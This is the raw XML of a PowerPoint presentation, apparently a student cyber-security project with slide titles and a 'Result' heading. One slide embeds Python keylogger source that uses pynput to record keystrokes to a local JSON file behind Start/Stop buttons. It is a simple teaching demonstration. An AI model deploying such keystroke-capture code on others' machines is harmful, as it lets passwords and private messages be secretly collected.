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2" d="100"/>
          <a:sy n="82" d="100"/>
        </p:scale>
        <p:origin x="864" y="8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CYBER SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048591" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2296914" y="3884687"/>
            <a:ext cx="7980183" cy="19202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endParaRPr b="1" dirty="0" sz="2000" lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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R</a:t>
            </a:r>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>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c</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ence</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neering</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" marL="457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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958948" y="2144896"/>
            <a:ext cx="9298744" cy="1665105"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr b="1" dirty="0"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Preprocessing:</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0" sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="1200" lang="en-IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Clean and preprocess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73" name=""/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3897607" y="9017598"/>
            <a:ext cx="4000000" cy="929639"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>j</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:endParaRPr sz="2800" lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2800" lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048674" name=""/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1228">
            <a:off x="896939" y="1502006"/>
            <a:ext cx="23093395" cy="5044441"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l" indent="-514350" marL="514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="400" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>
import tkinter as tk
from tkinter import *
from pynput import keyboard
import json
keys_used = []
flag = False
keys = ""
def generate_text_log(key):
    with open('key_log.txt', "w+") as keys:
        keys.write(key)
def generate_json_file(keys_used):
    with open('key_log.json', '+wb') as key_log:
        key_list_bytes = json.dumps(keys_used).encode()
        key_log.write(key_list_bytes)
def on_press(key):
    global flag, keys_used, keys
    if flag == False:
        keys_used.append(
            {'Pressed': f'{key}'}
        )
        flag = True
    if flag == True:
        keys_used.append(
            {'Held': f'{key}'}
        )
    generate_json_file(keys_used)
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
    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
start_button = Button(root, text="Start", command=start_keylogger)
start_button.pack(side=LEFT)
stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled')
stop_button.pack(side=RIGHT)
root.geometry("250x250")
root.mainloop()</a:t>
            </a:r>
            <a:endParaRPr sz="800" lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048676" name=""/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="896039" y="746042"/>
            <a:ext cx="7302863" cy="751839"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a: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09"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2021-05-26T05:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-08T09:54:33Z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f334451a9d304d05be4760740c5d5331</vt:lpwstr>
  </property>
</Properties>
</file>